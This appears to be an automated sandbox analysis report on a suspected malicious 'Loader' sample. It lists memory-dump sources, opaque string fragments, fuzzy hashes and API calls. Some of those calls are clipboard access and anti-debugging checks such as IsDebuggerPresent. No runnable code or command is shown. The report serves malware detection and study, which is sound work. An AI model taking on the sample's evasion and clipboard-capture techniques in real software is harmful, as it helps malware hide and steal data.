                                                                                              • String ID: ElN~$E~Eq$KM[p$iaQQ$l`kc$u\XZ$x`{l
                                                                                              • API String ID: 0-1700030734
                                                                                              • Opcode ID: 7ac441fee11ddcd18cd40191a11c225f6198f2a352731de0deba5e95dea7f8e5
                                                                                              • Instruction ID: 63d53697751287740cd5dfe0d2529f021af20d75a405d761f770b19dbd8f3775
                                                                                              • Opcode Fuzzy Hash: 7ac441fee11ddcd18cd40191a11c225f6198f2a352731de0deba5e95dea7f8e5
                                                                                              • Instruction Fuzzy Hash: 87522670604B518FC735CF35D490727BBE2BFA6314B588A6EC4E68BBA2C735A406CB54
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2832541153-0
                                                                                              • Opcode ID: 09544f04c9b9545be05f54a1fab6e8d685d67bd08ccf494fb3fc50990cd9a9dc
                                                                                              • Instruction ID: 50991bc8120a8f6633994fcf4ea51f97f0579ec4c4cf210033997cb15d72c0d6
                                                                                              • Opcode Fuzzy Hash: 09544f04c9b9545be05f54a1fab6e8d685d67bd08ccf494fb3fc50990cd9a9dc
                                                                                              • Instruction Fuzzy Hash: 7051E3B1D08B529BDB10AB7CD84935EBFA0AB16310F05873ED8E587782E33899548797
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &YEO$.$0$QT$_]$uvw
                                                                                              • API String ID: 0-2030970973
                                                                                              • Opcode ID: ebc4790e59144c5680add003c981ea3772d2de55c60af1bbfa7a47c1ea87a435
                                                                                              • Instruction ID: 354ed260a7db9cb0c9f96e03fa4c537c11ee5e85cd804ab200fadb0adb0c765f
                                                                                              • Opcode Fuzzy Hash: ebc4790e59144c5680add003c981ea3772d2de55c60af1bbfa7a47c1ea87a435
                                                                                              • Instruction Fuzzy Hash: 8EE1DFB19183908BD3358F24D8913EBBBE5EF91314F09992DD4DC9B341EB384A45CB86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 3FBE1E2615ADA210E9D82DE8C58062C2$\$zz$|$~dfb$~dfb
                                                                                              • API String ID: 0-3041039929
                                                                                              • Opcode ID: c49754e7000805bb51ad494d8f0304b8855312e5c86ecf378500041c882622bb
                                                                                              • Instruction ID: 839cde4d2aa054859e269cb4fbe231548cc83ddc2423923cf7f1f6be2950108b
                                                                                              • Opcode Fuzzy Hash: c49754e7000805bb51ad494d8f0304b8855312e5c86ecf378500041c882622bb
                                                                                              • Instruction Fuzzy Hash: 30C114B15087808BD314DF35C85076BBBE6EBD1314F188A6DE0D58B392DB78C80ACB56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &8&!$.0.)$/OK4$3 $n( T
                                                                                              • API String ID: 0-2164236613
                                                                                              • Opcode ID: 5aef2e973b4e60d09f2fb28fb63ebeff0de77a3e516d8cb7d3b29f12b8c906de
                                                                                              • Instruction ID: 9a941f880eb2b56ac47f73cca9204df19041a221f7beb1c2bda010225441caa4
                                                                                              • Opcode Fuzzy Hash: 5aef2e973b4e60d09f2fb28fb63ebeff0de77a3e516d8cb7d3b29f12b8c906de
                                                                                              • Instruction Fuzzy Hash: AC4113B490C380ABE7319B21D8917EBB7E1AF86304F44443DE4CE47252DB3958858B5B
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E65450
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00E6551C
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E6553C
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00E65546
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: 958c104ef960df282eadf412fdc007253e4e38b6c11518361d68a8595a58d964
                                                                                              • Instruction ID: 183bcaf11ec896e58961dbb717fa33f1b16e2e66165ac61c64aeda76c44ce028
                                                                                              • Opcode Fuzzy Hash: 958c104ef960df282eadf412fdc007253e4e38b6c11518361d68a8595a58d964
                                                                                              • Instruction Fuzzy Hash: 92310775D452189BDB20DFA4D989BCDBBF8AF08344F1040AAE40DAB251EB709A89CF45
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #" $$925?$de$`
                                                                                              • API String ID: 0-1022733961
                                                                                              • Opcode ID: 1661b4022cf63f6cbc3ea3f81cbd8155396afcffe94e4d3050bd65eec7f099ad
                                                                                              • Instruction ID: 1605bcd712b96b8e910cf545caec47bb681450ca7ca1f3ebefe6d5572f03a648
                                                                                              • Opcode Fuzzy Hash: 1661b4022cf63f6cbc3ea3f81cbd8155396afcffe94e4d3050bd65eec7f099ad
                                                                                              • Instruction Fuzzy Hash: ED0235B16083518FC714CF24E89136BBBE1AFD6304F18896EE8C58B352D679DD09CB5A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 89$L=W?$j$|
                                                                                              • API String ID: 0-4125282286
                                                                                              • Opcode ID: 747561adafd656159717a8ca9a24aeda04c8f50ab0e36f2f584ba69d8f09cbb9
                                                                                              • Instruction ID: de5bac40980abfdef45f7e19b5419603202ded9e5072bcc274b0e890077deb41
                                                                                              • Opcode Fuzzy Hash: 747561adafd656159717a8ca9a24aeda04c8f50ab0e36f2f584ba69d8f09cbb9
                                                                                              • Instruction Fuzzy Hash: 0FC1F57150C3858BD314DF14C8912ABBBE2EFD2354F188D2DE4D56B391D7798909CB8A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: MZ$PuB$T|${D
                                                                                              • API String ID: 0-192024179
                                                                                              • Opcode ID: f670e92a50876726d0d651d2332a6150a1ae34fa25b25b1f7bddcba9e894ad27
                                                                                              • Instruction ID: 49d0e742a7e591b898b8955d08f4c9dfa3d6426facac651bc41f070ffa886902
                                                                                              • Opcode Fuzzy Hash: f670e92a50876726d0d651d2332a6150a1ae34fa25b25b1f7bddcba9e894ad27
                                                                                              • Instruction Fuzzy Hash: 85E1E3B5908384DFE720CF64E84179FBBB1FB86304F10492DE599AB282DB749905CF96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @CE]$QOTL$cfgd$hl
                                                                                              • API String ID: 0-3013581571
                                                                                              • Opcode ID: 2b27ca999bfbf4531f2615d5e7df1e14beac3f20e94eaf77279a45262decfb69
                                                                                              • Instruction ID: cf8817326059fd3440c538897e82ccaa14daea822eaada39a8533d7532eaaa49
                                                                                              • Opcode Fuzzy Hash: 2b27ca999bfbf4531f2615d5e7df1e14beac3f20e94eaf77279a45262decfb69
                                                                                              • Instruction Fuzzy Hash: 5441897194C3809FD771CF24D8957EFBBE0EB86314F84892DD4AC9B291EB3089459B86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $sq
                                                                                              • API String ID: 0-3512095525
                                                                                              • Opcode ID: abfe21763b79abe7f0c2f42c22322df37258666e23fa8ed6aedc804afc6da9d9
                                                                                              • Instruction ID: f4751416ab142c5d40087c6aaed000c10fe84f5eaee8573a0ee5c50262f2e2a3
                                                                                              • Opcode Fuzzy Hash: abfe21763b79abe7f0c2f42c22322df37258666e23fa8ed6aedc804afc6da9d9
                                                                                              • Instruction Fuzzy Hash: AE9266715083518BD324CF29C8913ABB7E2FFC9314F18896EE4C58B391E7389946CB86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: B_B$nY
                                                                                              • API String ID: 0-2927723309
                                                                                              • Opcode ID: a7e8c12878a5f57eacf71440ebd9f9b624e4cdb69c3f71f7f43ba77086ed7ff5
                                                                                              • Instruction ID: 851f56d48290151247995a9fe05417a98e88fe751e34d36bcc2cba4602582032
                                                                                              • Opcode Fuzzy Hash: a7e8c12878a5f57eacf71440ebd9f9b624e4cdb69c3f71f7f43ba77086ed7ff5
                                                                                              • Instruction Fuzzy Hash: 8F32FD76E00616DFDB18CF68EC916AEB7B2FB4A310F598878D811A7391D778AC11CB44
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: f$pqss
                                                                                              • API String ID: 2994545307-2822532200
                                                                                              • Opcode ID: 2937ded457d6c5c1f02474bf962230439ca0037f4f2839544dec9941d4d193ce
                                                                                              • Instruction ID: a432368530c22ddd3869b204a4db902ec7438b05474746996580aad5f7d8c7a6
                                                                                              • Opcode Fuzzy Hash: 2937ded457d6c5c1f02474bf962230439ca0037f4f2839544dec9941d4d193ce
                                                                                              • Instruction Fuzzy Hash: EF123A71A093418FD714CF2AC891B2FB7E2ABD9314F18D93EE89587392D778D8058B46
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 9492$~PF9
                                                                                              • API String ID: 0-997091799
                                                                                              • Opcode ID: 2f5b2c12987dcfe2c1bf18acf4207b4fcf035ee68b446e773eb6bb284b27880d
                                                                                              • Instruction ID: 60f4f6e0d767a5311d44965940b9869cf196bd322a4f156537de99f0e5a6a042
                                                                                              • Opcode Fuzzy Hash: 2f5b2c12987dcfe2c1bf18acf4207b4fcf035ee68b446e773eb6bb284b27880d
                                                                                              • Instruction Fuzzy Hash: AFE1F971204B818EE735CB39C4617A3BBE2AF57304F08965DC0EB8B796D738A506CB55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: )2$8+
                                                                                              • API String ID: 0-2987566432
                                                                                              • Opcode ID: 1d64a08b1ff8a32b770b1c09d7f5f0debd4f632e4742ec5e448c14563ac26e2a
                                                                                              • Instruction ID: a4df1e9506f11f0b10418865666275f934ed96cd19121d1caba471525ecbde28
                                                                                              • Opcode Fuzzy Hash: 1d64a08b1ff8a32b770b1c09d7f5f0debd4f632e4742ec5e448c14563ac26e2a
                                                                                              • Instruction Fuzzy Hash: 6651D572A583918BD324DF79C851B9FB6E2AFC6304F18C93ED4D9E7281E63888058756
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `b]}$`b]}
                                                                                              • API String ID: 0-3096439733
                                                                                              • Opcode ID: 7218b401843c5a04db182008f5258fedd2e39ff33f3a6aebb396eafc764163da
                                                                                              • Instruction ID: 06f219d2918ac6cbf396bf0f417855734cb004616eb9ee711412ef50a3ad00f2
                                                                                              • Opcode Fuzzy Hash: 7218b401843c5a04db182008f5258fedd2e39ff33f3a6aebb396eafc764163da
                                                                                              • Instruction Fuzzy Hash: 085113745083818BD3218F29D9507BBBBE1EB97315F24496EE1D1872A2D37988968B0A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &YEO$0
                                                                                              • API String ID: 0-1426676170
                                                                                              • Opcode ID: 85e7ee97bfd75808e2c48e2923531847fc73b7074065bbbbd9d0e700215024e3
                                                                                              • Instruction ID: eb04d6bcb5de6289af99859cb5ac66577bfe0af35e4531a9e3203bf2d4644e04
                                                                                              • Opcode Fuzzy Hash: 85e7ee97bfd75808e2c48e2923531847fc73b7074065bbbbd9d0e700215024e3
                                                                                              • Instruction Fuzzy Hash: 775105B09083508BD3319F29C8A07EBB7E1EF92314F045A6DE4D997292EB3C5945CB96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &YEO$0
                                                                                              • API String ID: 0-1426676170
                                                                                              • Opcode ID: 41cc78655a8a020beb38f8ed3c97341421bfeb5d67eecc8f506d2c4ea467456e
                                                                                              • Instruction ID: 26baf0a1b8c53d80be862f2a9dad25389fadc0843a6e210c8a512af2a8a8cc3c
                                                                                              • Opcode Fuzzy Hash: 41cc78655a8a020beb38f8ed3c97341421bfeb5d67eecc8f506d2c4ea467456e
                                                                                              • Instruction Fuzzy Hash: 5A4115B19083508BD3319F28C8A07EBB7F1EF92314F045A6DD4D99B382DB385945CB96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &YEO$0
                                                                                              • API String ID: 0-1426676170
                                                                                              • Opcode ID: 81e70c0187fc280d42d4b4dc0e48b9fa696f1d13af4fc8e155292d521e920ec6
                                                                                              • Instruction ID: 60919286921f796901d9bddcd6d1baa29b74ee202a7c0244e46f46a401eb3cb4
                                                                                              • Opcode Fuzzy Hash: 81e70c0187fc280d42d4b4dc0e48b9fa696f1d13af4fc8e155292d521e920ec6
                                                                                              • Instruction Fuzzy Hash: DA51F3B09083508BD3219F29C8A07EBB7F1EF96314F045A6DE4D99B282DB385945CB96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r D
                                                                                              • API String ID: 0-1275184135
                                                                                              • Opcode ID: ce48a3c9b0fa638733b3dcb3ae2aa973df0f9a68e8975aeb9a0a9baac5ebf188
                                                                                              • Instruction ID: 6613827ec3c10122b2e5d361333fd8ba05874ea33edfc9b2f87dc349e6a0f25c
                                                                                              • Opcode Fuzzy Hash: ce48a3c9b0fa638733b3dcb3ae2aa973df0f9a68e8975aeb9a0a9baac5ebf188
                                                                                              • Instruction Fuzzy Hash: FF42023960A251CFD708CF28D8D166AB7E1FB8A314F0A897DD985873A1D738D841CB85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r D
                                                                                              • API String ID: 0-1275184135
                                                                                              • Opcode ID: 9fb41d32e706f55cc12b4f8d34d2204635963b9735128b16c4cc16e082c4ef24
                                                                                              • Instruction ID: 3fa07439a0f7573cb0706cfdeefb847a8e64a9e91e7d9db493dc6942fee0f14a
                                                                                              • Opcode Fuzzy Hash: 9fb41d32e706f55cc12b4f8d34d2204635963b9735128b16c4cc16e082c4ef24
                                                                                              • Instruction Fuzzy Hash: 6422103960A251CFD748CF28D8D026AB7E2FB8A354F0E897DD98587361D738E841CB85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r D
                                                                                              • API String ID: 0-1275184135
                                                                                              • Opcode ID: b58ca49894712a8566ac4dc3d5a6e7b9d933ccbb47a1014a1bb0e5db58485cd6
                                                                                              • Instruction ID: fca6e19647abad176c6f28147ff5be21218197b10133bc286f28f7041be03caa
                                                                                              • Opcode Fuzzy Hash: b58ca49894712a8566ac4dc3d5a6e7b9d933ccbb47a1014a1bb0e5db58485cd6
                                                                                              • Instruction Fuzzy Hash: 8C12F23AA0A351CFD708CF28D8D062AB7E2FB8A354F1A897DD98587361D734D845CB85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r D
                                                                                              • API String ID: 0-1275184135
                                                                                              • Opcode ID: 447b05bc3f8918469a4429b700c0a1ef2244e428fb08f6a37e2d8b533b43c3fb
                                                                                              • Instruction ID: 39202574c58b34a1224b564560cbcbca7079311a1b355e9ffad27d65d55dd8b2
                                                                                              • Opcode Fuzzy Hash: 447b05bc3f8918469a4429b700c0a1ef2244e428fb08f6a37e2d8b533b43c3fb
                                                                                              • Instruction Fuzzy Hash: 6602F039B09351CFD708CF28D89026AB7E2FB8A364F0A897DD98587361D739D841CB85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r D
                                                                                              • API String ID: 0-1275184135
                                                                                              • Opcode ID: 5df328c7d032e8fe84d5b444499398a42f283de1ee7890aea5255797a19c1c89
                                                                                              • Instruction ID: 5292721a63ed74f8458c42dd38fcae3cac322072aab462580ba53c2b3963f632
                                                                                              • Opcode Fuzzy Hash: 5df328c7d032e8fe84d5b444499398a42f283de1ee7890aea5255797a19c1c89
                                                                                              • Instruction Fuzzy Hash: A4F11279A09351CFD708CF28D89022BB7E2FB8A354F0A897DD98687391D739D841CB85
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(00445598,00000000,00000001,00445588), ref: 00424E19
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID:
                                                                                              • API String ID: 542301482-0
                                                                                              • Opcode ID: c9e3f42f2496e3834fa400150481dc9dd8723b376f478ce9e6d5572c437d6800
                                                                                              • Instruction ID: 8f26748d61ac36b2e9bc8865003d1212a895a297ddedaabadd5d9704f4d57fb6
                                                                                              • Opcode Fuzzy Hash: c9e3f42f2496e3834fa400150481dc9dd8723b376f478ce9e6d5572c437d6800
                                                                                              • Instruction Fuzzy Hash: DB51CFB17002209BDB209B24EC86B7773A4FFC5768F4A4559F985CB391E778E900C76A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: 0
                                                                                              • API String ID: 2994545307-4108050209
                                                                                              • Opcode ID: 499601384c7250a67f61823f0e1ca8916f94d06def2dadd89bdf99aefc78f7c6
                                                                                              • Instruction ID: 82841ebd4d3e9e7505bba7a2f5555baad8950d30653fb2d3e8b07ce87f153982
                                                                                              • Opcode Fuzzy Hash: 499601384c7250a67f61823f0e1ca8916f94d06def2dadd89bdf99aefc78f7c6
                                                                                              • Instruction Fuzzy Hash: E1D1DF74508381CFD724CF24D460BAFBBE1FB8A314F14896EE4D647262D735A946CB8A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: \=m?
                                                                                              • API String ID: 0-3927515410
                                                                                              • Opcode ID: ab601c91d158b981441ac4e58b38dbcd3cec6419c0c30c0d1e3296104fb824d5
                                                                                              • Instruction ID: d7ada216deb33fd426f847a6b674989f43deeaac360895e3897c7e459550c470
                                                                                              • Opcode Fuzzy Hash: ab601c91d158b981441ac4e58b38dbcd3cec6419c0c30c0d1e3296104fb824d5
                                                                                              • Instruction Fuzzy Hash: 96B1DEB16083568BD720CF24D84036BBBE1FFC1304F54892DE9999B281EB789949CB86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K
                                                                                              • API String ID: 0-856455061
                                                                                              • Opcode ID: dc98db39b9db22c99a7edb9309d7fe55712ab32d1157a83f4ff06d024a2e7697
                                                                                              • Instruction ID: 14d05baf9ebd69673c9dcd38147bb042d9b28a0b7e1958224a48f40b73bb0492
                                                                                              • Opcode Fuzzy Hash: dc98db39b9db22c99a7edb9309d7fe55712ab32d1157a83f4ff06d024a2e7697
                                                                                              • Instruction Fuzzy Hash: 25A1E73160D3914FC319CF29C49062EBBE1AFD9314F198A6EE4E5473D2D679D806CB86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: z\B
                                                                                              • API String ID: 0-3108062591
                                                                                              • Opcode ID: 31794fa057f5a9485f02d9e3383861910ad714f1c367ccdd65adb1906d5748fb
                                                                                              • Instruction ID: 18a4686d9457f54035211fa5fd17e537f792f59ad71be5826e009a95238e3c8e
                                                                                              • Opcode Fuzzy Hash: 31794fa057f5a9485f02d9e3383861910ad714f1c367ccdd65adb1906d5748fb
                                                                                              • Instruction Fuzzy Hash: 9991E576614B408ED325CF35C8917A3BBE2EF96304F48896DC0EB8B385D73DA5098B15
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 5|iL
                                                                                              • API String ID: 0-1880071150
                                                                                              • Opcode ID: 24ae80988b112d0df9409a465defe5bbf2815b7d67a9c0cc2b486bd14612a374
                                                                                              • Instruction ID: 615e6df6665e718ef1b0ed1c4196a27fa8a302d40aa64b537871091cbe2286e7
                                                                                              • Opcode Fuzzy Hash: 24ae80988b112d0df9409a465defe5bbf2815b7d67a9c0cc2b486bd14612a374
                                                                                              • Instruction Fuzzy Hash: 2E512832E083609BD720DE29998065BF7D6AB89724F1A953EDCD8AB351D239DC0187C5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r D
                                                                                              • API String ID: 0-1275184135
                                                                                              • Opcode ID: cde81672914e9bccc3dc1822039c813eddc75743a2b483219164b49db39d6c13
                                                                                              • Instruction ID: 4baa837a682e00b79eec7ecbeffd83229dd96bd549b6dc17f852592ab8d503e6
                                                                                              • Opcode Fuzzy Hash: cde81672914e9bccc3dc1822039c813eddc75743a2b483219164b49db39d6c13
                                                                                              • Instruction Fuzzy Hash: 2341E439A1A251CFD348CF38D88022BB7E2EB8A315F0D98BDE489C7251D739C846CB55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: z\B<
                                                                                              • API String ID: 0-2906659120
                                                                                              • Opcode ID: 3efc317941df68850e947550c7d882803de32b64531bf8ce015460ea843ce15c
